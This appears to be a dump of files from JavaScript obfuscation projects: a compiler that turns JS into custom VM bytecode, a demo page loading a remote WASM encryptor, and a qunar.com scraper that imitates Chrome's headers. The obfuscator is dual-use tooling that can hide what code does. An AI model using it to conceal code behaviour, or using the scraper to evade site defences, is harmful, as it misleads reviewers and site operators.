zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(44)
}else if (node.operator == "typeof"){
zhili.push(49)
}else if (node.operator == "!"){
zhili.push(60)
}else if (node.operator == "-"){
zhili.push(50)
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(55)
}else if (node.operator == "void"){
zhili.push(56)
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
if (node.arguments[i].type == "AssignmentExpression" && node.arguments[i].operator == "="){
startgetType(node.arguments[i].left, variablePool, zhili)
}
}
startgetType(node.callee, variablePool, zhili)
if (node.callee.type == "AssignmentExpression"){
startgetType(node.callee.left, variablePool, zhili)
}
zhili.push(150)
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.id.name))
zhili.push(181)
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(bcxh))
zhili.push(181)
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(1810)
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(10)
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(104)
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(58)
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(10)
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(45)
break
case "ArrayExpression":
zhili.push(105)
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(40)
}
break;
case "RegExpLiteral":
zhili.push(8)
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(195)
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(200)
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(197)
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
startgetType(node.left, variablePool, zhili)
zhili.push(20)
zhili.push(90)
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(291)
zhili.push(90)
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(32)
zhili.push(90)
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(dat[node.operator.replace("=","")])
zhili.push(90)
}
else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
if (node.right.type == "AssignmentExpression"){
startgetType(node.right, variablePool, zhili)
startgetType(node.right.left, variablePool, zhili)
}else{
startgetType(node.right, variablePool, zhili)
}
zhili.push(290)
}
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(47)
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(46)
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(-1)
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
// Compile a function declaration/expression into its own bytecode unit.
// The unit is registered in the global `changlc` table under a fresh
// "awcbb_yhh_fun<N>" name, holding its variable pool and instruction list.
function startfun(node2) {
    const name = "awcbb_yhh_fun" + numberKuai;
    numberKuai += 1;
    changlc[name] = {"variablePool": {}, "zhili": []};
    const pool = changlc[name]["variablePool"];
    const code = changlc[name]["zhili"];

    // Bind each parameter: opcode 10 is always emitted with a constant-pool
    // index for the parameter name (emission pattern; see interpreter).
    for (let idx = 0; idx < node2.params.length; idx++) {
        const param = node2.params[idx];
        if (param.type === "AssignmentPattern") {
            // Parameter with a default value: compile the default first.
            pool[param.left.name] = null;
            startgetType(param, pool, code);
            code.push(10);
            code.push(toPool(param.left.name));
        } else {
            pool[param.name] = null;
            code.push(10);
            code.push(toPool(param.name));
        }
    }

    code.push(2); // terminates the parameter section (matches interpreter convention)
    startgetType(node2.body, pool, code);

    // Build a prologue that pre-declares every nested compiled function
    // (their pool entries hold "awcbb_yhh_fun…" names); opcode 1 ends it.
    const prologue = [];
    for (const key in pool) {
        if (pool[key] && pool[key].indexOf("awcbb_yhh_fun") != -1) {
            prologue.push(10);
            prologue.push(toPool(key));
        }
    }
    prologue.push(1);
    const total = prologue.length;
    // Pop from the back while inserting at the front, so the prologue
    // ends up at the start of the unit in its original order.
    for (let idx = 0; idx < total; idx++) {
        code.splice(0, 0, prologue.pop());
    }
}
// Compile the top-level Program node of a parsed file into the root
// bytecode unit registered in `changlc`.
function start(node2) {
    const name = "awcbb_yhh_fun" + numberKuai;
    numberKuai += 1;
    changlc[name] = {"variablePool": {}, "zhili": []};
    const pool = changlc[name]["variablePool"];
    const code = changlc[name]["zhili"];

    // Emit every top-level statement in source order.
    const statements = node2.program.body;
    for (let idx = 0; idx < statements.length; idx++) {
        startgetType(statements[idx], pool, code);
    }

    // Prologue: hoist names of nested compiled functions (pool entries
    // holding "awcbb_yhh_fun…" values); opcode 1 terminates the prologue.
    const prologue = [];
    for (const key in pool) {
        if (pool[key] && pool[key].indexOf("awcbb_yhh_fun") != -1) {
            prologue.push(10);
            prologue.push(toPool(key));
        }
    }
    prologue.push(1);
    const total = prologue.length;
    // Reverse-insert at index 0 so the prologue keeps its original order.
    for (let idx = 0; idx < total; idx++) {
        code.splice(0, 0, prologue.pop());
    }
}
start(ast)
cood = ``
datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
fs.writeFileSync("./outsrc/out.js", cood + datatext, (e)=>{})
}
// Input script to virtualize; read from ./src (or ./dist when transpiled).
const soure = "test.js"
// When ES5 mode is on, first transpile with traceur, then compile the
// transpiled output; otherwise compile the source directly.
if (offes5 ===1){
process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
if (!error) {
console.log("es6 to es5 ==> 成功");
cbbjsvmp()
console.log("file is save ==> ./outsrc/out.js");
} else {
console.log("es6 to es5 ==> 失败");
}
});
} else {
cbbjsvmp()
console.log("file is save ==> ./outsrc/out.js");
}
|
2833844911/gojsvmp | 1,250 | wasmvmptest.html | <html>
<!-- Demo page: loads a Go WASM module and encrypts the text-box value.
     The WASM side is expected to expose getCyDt() and to call
     window.cycallback(result) when done (presumably — confirm against
     the Go source). -->
<style>
/* Center the form vertically and horizontally with flexbox. */
body, html {
height: 100%;
margin: 0;
font-family: Arial, sans-serif;
}
.container {
height: 100%;
display: flex;
justify-content: center;
align-items: center;
flex-direction: column;
}
input[type="text"] {
padding: 10px;
margin: 10px 0;
width: 200px;
border: 2px solid #ccc;
border-radius: 5px;
}
button {
padding: 10px 20px;
font-size: 16px;
color: white;
background-color: #007BFF;
border: none;
border-radius: 5px;
cursor: pointer;
}
button:hover {
background-color: #0056b3;
}
</style>
<script src="static/wasm_exec.js"></script>
<script>
// Callback invoked from the WASM module with the encryption result.
window.cycallback = function (a){
console.log("加密结果",a)
alert("加密结果"+ a)
};
// Submit handler: forward the input value to the WASM-exported getCyDt().
window.cbbbbbbbbbbb = function (){
var inputValue = document.getElementById('inputBox').value;
getCyDt(inputValue)
}
// Boot the Go WASM runtime (Go class comes from wasm_exec.js above).
const go = new Go();
WebAssembly.instantiateStreaming(fetch("https://ciyverify.com/cyvmp4.wasm"), go.importObject)
.then((result) => go.run(result.instance));
</script>
<body>
<div class="container">
<input type="text" id="inputBox" placeholder="输入加密值">
<button onclick="cbbbbbbbbbbb()">Submit</button>
</div>
</body>
</html> |
2833844911/gojsvmp | 2,280 | test2.js | // -- gbk --
// Scraper "class" for qunar.com travel-guide listing pages. It runs inside
// the cy_jsvmp runtime, which supplies cyhttp, cyout, etree, fs, and the
// promise hooks cbb_a/cbb_b (appear to resolve/reject the wrapping Promise
// — confirm against the runtime).
// NOTE(review): this file was GBK-encoded and its Chinese comments/log
// strings were garbled in transit; runtime strings are preserved verbatim.
function goTonr(){
// Browser-like request headers (copied from a Chrome session).
this.headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"accept-language": "zh-CN,zh;q=0.9",
"cache-control": "no-cache",
"pragma": "no-cache",
"priority": "u=0, i",
"referer": "https://travel.qunar.com/search/gonglue/22-shanghai-299878/hot_heat/3.htm",
"^sec-ch-ua": "^\\^Google",
"sec-ch-ua-mobile": "?0",
"^sec-ch-ua-platform": "^\\^Windows^^^",
"sec-fetch-dest": "document",
"sec-fetch-mode": "navigate",
"sec-fetch-site": "same-origin",
"sec-fetch-user": "?1",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
}
// Fetch one listing page, then parse titles/links and append them to a.csv.
this.getPageInfo = function (url){
console.log("ʼ첽Promise",url)
var d = new Promise(function(){
req = cyhttp.get(url,{
"headers": this.headers,
"timeout": 30,
// "proxies":"http://127.0.0.1:8888"
})
cyout(req.text)
// cbb_a feeds the first then-handler, cbb_b the second
// (original GBK comment garbled; meaning inferred — confirm).
cbb_a(req.text)
})
d.then(function (text){
// XPath extraction of guide titles and their relative links.
parseHTML = etree.HTML(text)
title = parseHTML.xpath('//ul[@class="b_strategy_list "]/li//h2')
urlList = parseHTML.xpath('//ul[@class="b_strategy_list "]/li//h2/a/@href')
var b = fs.open("./a.csv",{"ms":"a"})
for (var i=0 ; i<title.length; i++){
b.write( [title[i].xpath('.//text()').join(" "), "https://travel.qunar.com"+urlList[i]].join(",")+"\n")
console.log(title[i].xpath('.//text()').join(" "))
}
b.close()
console.log("첽")
})
}
}
// Reset a.csv with an empty header row, then crawl pages 1..9.
var b = fs.open("./a.csv",{"ms":"w"})
b.write(["",""].join(",")+"\n")
b.close()
var ff = new goTonr()
for (var i =1; i<10; i++){
st = Date.now()
ff.getPageInfo("https://travel.qunar.com/search/gonglue/22-shanghai-299878/hot_heat/"+i+".htm")
// Block until the pending async request completes (original GBK comment garbled).
wait()
cyout("ʱ", Date.now() - st, "ms")
debugger
// Sleep 10000 ms between pages to avoid hammering the server.
Date.sleep(10000)
}
|
2833844911/cy_jsvmp | 31,691 | main_pro.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const process = require("child_process");
const {es6toes5} = require("./tool/es5toes6");
const {switchtoif} = require("./tool/switchtoif");
const {bindfun} = require("./tool/bindfun");
// Whether to transpile the input to ES5 first (1 = yes).
offes5 = 0
// Map from binary-operator token to its VM opcode number.
var dat = {"instanceof": 1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
// datkey becomes the compound-assignment forms ("+=", "<=" + "=" etc.)
// used to detect operators like "*=" during AssignmentExpression lowering.
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++)
{
datkey[i] = datkey[i]+"="
}
// Counter giving each for-in loop a unique set of synthetic loop variables.
var fornum = 0
// Shared instruction buffer for protected "cbb_" functions (see startfun2).
var codeOfmyfun = [];
// Compile `soure` (a filename under ./src, or ./dist when pre-transpiled)
// into a self-contained VM payload written to `outpath`. The payload embeds
// the constant pool, the per-function bytecode table (changlc), and the
// interpreter template from ./tool/jsvmp_out_pro.js.
function cbbjsvmp(soure,outpath){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
// Interpreter template appended verbatim to the generated data blob.
var dataText2 = fs.readFileSync("./tool/jsvmp_out_pro.js") + '';
// Per-unit bytecode table and shared literal pool for this compilation.
var changlc = {}
var constantPool = []
dataText = es6toes5(dataText)
var ast = parser.parse(dataText)
// Normalize identifiers via the rename plugin before emission.
ast = renameCj(ast)
// dataText2 = switchtoif(dataText2)
// Counter used to mint unique "awcbb_yhh_fun<N>" unit names.
var numberKuai = 0
// Append every element of `newl` onto `sour`, in order (in-place concat).
function copyArrayList(sour, newl) {
    for (const item of newl) {
        sour.push(item);
    }
}
// Intern `value` in the shared constantPool and return its index.
// Identical constants share a single slot (linear search by indexOf).
function toPool(value) {
    const existing = constantPool.indexOf(value);
    if (existing != -1) {
        return existing;
    }
    constantPool.push(value);
    return constantPool.length - 1;
}
// Bytecode emitter: recursively walks a Babel AST node and appends VM
// opcodes/operands onto `zhili`, interning literals via toPool() and
// recording declared names in `variablePool`. `come` marks compilation
// inside a protected "cbb_" unit, which changes how ReturnStatement is
// lowered (opcodes 1814/1816 instead of -1; see the ReturnStatement case).
// NOTE(review): the switch body below is left textually untouched — jump
// targets (e.g. after opcodes 190/192/25) are relative offsets computed
// from exact instruction counts, so any structural edit risks corrupting
// the emitted control flow.
function startgetType(node, variablePool, zhili, come){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili, come);
zhili.push(192)
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3, come)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(190)
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2, come)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili, come)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili, come)
zhili.push(57)
zhili.push(fbme)
zhili.push(10)
zhili.push(toPool( 0))
zhili.push(23)
zhili.push(22)
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(181)
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("length"))
zhili.push(181)
zhili.push(240)
zhili.push(25)
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy, come)
startgetType(node.left.declarations[0].id, variablePool,dyyy, come)
}else {
startgetType(node.left, variablePool,dyyy, come)
}
dyyy.pop()
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(181)
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(181)
dyyy.push(181)
dyyy.push(90)
startgetType(node.body,variablePool,dyyy, come)
dyyy.push(23)
dyyy.push(26)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(190)
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili, come)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili, come)
zhili.push(20)
zhili.push(90)
startgetType(node.argument, variablePool, zhili, come)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili, come)
zhili.push(19)
zhili.push(90)
startgetType(node.argument, variablePool, zhili, come)
}
break
case "LabeledStatement":
let vbvb = [];
let vbvbname = node.label.name;
startgetType(node.body, variablePool, vbvb, come)
for (var ff=0; ff<vbvb.length; ff++){
if (vbvb[ff] === vbvbname){
vbvb[ff] = 190;
vbvb[ff+1] = vbvb.length - ff-2;
}
}
copyArrayList(zhili, vbvb)
break
case "BreakStatement":
if (node.label){
zhili.push(node.label.name)
zhili.push(undefined)
}else {
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
}
break
case "DebuggerStatement":
zhili.push(194)
break
case "ForStatement":
startgetType(node.init, variablePool,zhili, come)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili, come)
if (node.test == null)
{
zhili.push(10)
zhili.push(toPool(true))
}
zhili.push(25)
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj, come)
startgetType(node.update, variablePool, fgfgfdsujj, come)
fgfgfdsujj.push(190)
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili, come)
zhili.push(25)
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj, come)
jiiiujj.push(190)
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj, come)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili, come)
zhili.push(192)
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili, come)
zhili.push(23)
zhili.push(22)
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili, come)
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(10)
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili, come)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz, come)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(10)
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(10)
zhili.push(toPool(zwdz[i]))
}
zhili.push(10)
zhili.push(toPool(gggcbb.length))
zhili.push(48)
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = 190;
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili, come)
zhili.push(51)
let bh = []
startgetType(node.right, variablePool, bh, come)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili, come)
zhili.push(252)
let bh = []
startgetType(node.right, variablePool, bh, come)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "BigIntLiteral":
case "StringLiteral":
zhili.push(10)
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.name))
zhili.push(181)
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili, come)
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(10)
zhili.push(toPool(node.property.name))
zhili.push(181)
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool(node.property.value))
zhili.push(181)
}else{
startgetType(node.property, variablePool, zhili, come)
zhili.push(181)
}
break
case "BinaryExpression":
startgetType(node.left, variablePool, zhili, come)
startgetType(node.right, variablePool, zhili, come)
zhili.push(dat[node.operator])
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili, come)
}
if (node.operator == "~"){
zhili.push(44)
}else if (node.operator == "typeof"){
zhili.push(49)
}else if (node.operator == "!"){
zhili.push(60)
}else if (node.operator == "-"){
zhili.push(50)
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(55)
}else if (node.operator == "void"){
zhili.push(56)
}
break
case "CallExpression":
if (node.callee.type==="Identifier" && node.callee.name === "cbb_prgnx"){
zhili.push(1820)
break
}
if (node.callee.type==="Identifier" && node.callee.name === "cbb_prgunx"){
zhili.push(1821)
break
}
if (node.callee.type==="Identifier" && node.callee.name === "cbb_prg"){
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i].callee, variablePool, zhili, come)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.arguments[i].callee.name))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("fg"))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("cbb_isokk_yhh_very_p"))
for (let i2 =0;i2 < node.arguments[i].arguments.length; i2++){
startgetType(node.arguments[i].arguments[node.arguments[i].arguments.length - i2-1], variablePool, zhili)
}
zhili.push(1818)
zhili.push(1817)
}
zhili.push(1812)
zhili.push(1819)
break
}
if (node.callee.type==="Identifier" && node.callee.name.indexOf("cbb_") === 0){
zhili.push(10)
zhili.push(toPool("cbbiyhh_dgggg_opopop"))
}
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili, come)
}
if (node.callee.type==="Identifier" && node.callee.name.indexOf("cbb_") === 0){
startgetType(node.callee, variablePool, zhili, come)
zhili.push(1812)
zhili.push(1813)
}else {
startgetType(node.callee, variablePool, zhili, come)
zhili.push(150)
zhili.push(node.arguments.length)
}
break
case "FunctionDeclaration":
if (node.id.name.indexOf("cbb_") === 0){
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun2(node)
}else {
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
}
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.id.name))
zhili.push(181)
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(bcxh))
zhili.push(181)
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili, come)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "AssignmentExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(1810)
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(10)
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(104)
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili, come)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili, come)
zhili.push(58)
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(10)
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili, come)
}
startgetType(node.value, variablePool,zhili, come)
zhili.push(45)
break
case "ArrayExpression":
zhili.push(105)
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili, come)
zhili.push(40)
}
break;
case "RegExpLiteral":
zhili.push(8)
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(195)
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc, come)
bcnxbc.push(200)
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc, come)
bcnxbc.pop()
bcnxbc.push(197)
startgetType(node.handler.body, variablePool, bcnxbc,come)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc, come)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(20)
zhili.push(90)
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(291)
zhili.push(90)
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(32)
zhili.push(90)
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.left, variablePool, zhili,come)
startgetType(node.right, variablePool, zhili,come)
zhili.push(dat[node.operator.replace("=","")])
zhili.push(90)
}
else{
startgetType(node.left, variablePool, zhili,come)
zhili.pop()
startgetType(node.right, variablePool, zhili,come)
zhili.push(290)
}
// startgetType(node.left, variablePool, zhili,come)
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili,come)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili,come)
}
break
case "ThisExpression":
